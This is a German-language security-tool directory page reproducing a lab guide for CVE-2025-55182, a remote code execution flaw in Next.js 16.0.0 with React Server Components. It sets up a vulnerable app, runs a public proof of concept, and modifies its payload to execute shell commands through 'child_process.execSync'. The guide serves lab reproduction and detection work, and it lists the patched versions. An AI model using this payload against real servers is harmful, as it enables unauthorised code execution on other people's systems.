Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/jandelima/cve-2025-55182-poc-test
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

Reproduzierbares Labor, das die Remote-Code-Ausführung CVE-2025-55182 gegen Next.js 16.0.0 mit React Server Components demonstriert, einschließlich externer Exploit-Ausführung und Nebenwirkungsüberprüfung.

Repository anzeigen
3vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 Demonstrationslabor (Next.js / React RSC RCE)

Dieses Dokument bietet eine vollständige und reproduzierbare Einrichtung zur Demonstration der Remote Code Execution (RCE) von CVE-2025-55182 gegen eine anfällige Next.js + React Server Components Umgebung, die innerhalb einer Multipass Ubuntu VM läuft.

Der Exploit wird von außerhalb der VM ausgeführt, was die Remote-Ausnutzbarkeit beweist und die Umgebung für die Erkennung anomalen Verhaltens vorbereitet.

Source: https://github.com/ejpir/CVE-2025-55182-research


1. Ubuntu VM erstellen und vorbereiten

2. Grundlegende Einrichtung innerhalb der VM

2.1 System aktualisieren und Abhängigkeiten installieren

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Node.js LTS (20.x) installieren

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

Überprüfen:

root@kitploit:~
node -v
npm -v

2.3 Dedizierten Benutzer für die App erstellen

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. Die anfällige Next.js-App bereitstellen

3.1 Arbeitsverzeichnis erstellen

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 Ein minimales Next.js App Router-Projekt generieren

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 Anfällige Versionen in package.json festlegen

Abhängigkeiten bearbeiten:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

Pakete neu installieren:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

Überprüfen:

root@kitploit:~
npm list react react-dom next

Erwartet:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 Erstellen und im Produktionsmodus ausführen

root@kitploit:~
npm run build
npm start

Erwartete Ausgabe:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. Externe Erreichbarkeit bestätigen (Angreifermaschine → VM)

Auf einer anderen Maschine:

root@kitploit:~
curl http://10.102.169.126:3000

Sie sollten die standardmäßige Next.js HTML-Seite erhalten.


5. PoC auf der Angreifermaschine klonen und testen

5.1 Repository klonen

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 PoC auf die Server-IP ausrichten

Finden Sie:

root@kitploit:~
hostname: 'localhost',

Ersetzen Sie mit:

root@kitploit:~
hostname: '10.X.X.X',

5.3 Basis-PoC ausführen (einfaches console.log RCE)

Während Next noch läuft:

root@kitploit:~
node test-simple.cjs

Erwartet im Next.js-Terminal:

root@kitploit:~
NON-CHUNKED-RCE

Dies bestätigt Remote Code Execution über React Flight unter Verwendung der anfälligen Versionen.

confirmed


6. PoC modifizieren, um einen sichtbaren Seiteneffekt (Dateierstellung) auszuführen

Das Ziel ist es, beobachtbares Verhalten zu erzeugen (Dateisystem + Prozessausführung).

6.1 _prefix in test-simple.cjs bearbeiten

Finden Sie:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

Ersetzen Sie mit:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

Hinweis: require ist im Ausführungskontext nicht verfügbar, aber process.mainModule.require() schon.

6.2 Modifizierten Exploit testen

Stellen Sie sicher, dass Next läuft, dann:

root@kitploit:~
node test-simple.cjs

Dateierstellung überprüfen:

root@kitploit:~
ls -l /tmp/

Sie sollten sehen:

root@kitploit:~
cve-2025-55182-syscall

Dies bestätigt funktionale RCE mit Seiteneffekten.

start


Patch:
React ≥ 19.2.1
Next.js ≥ 16.0.7

Tool herunterladen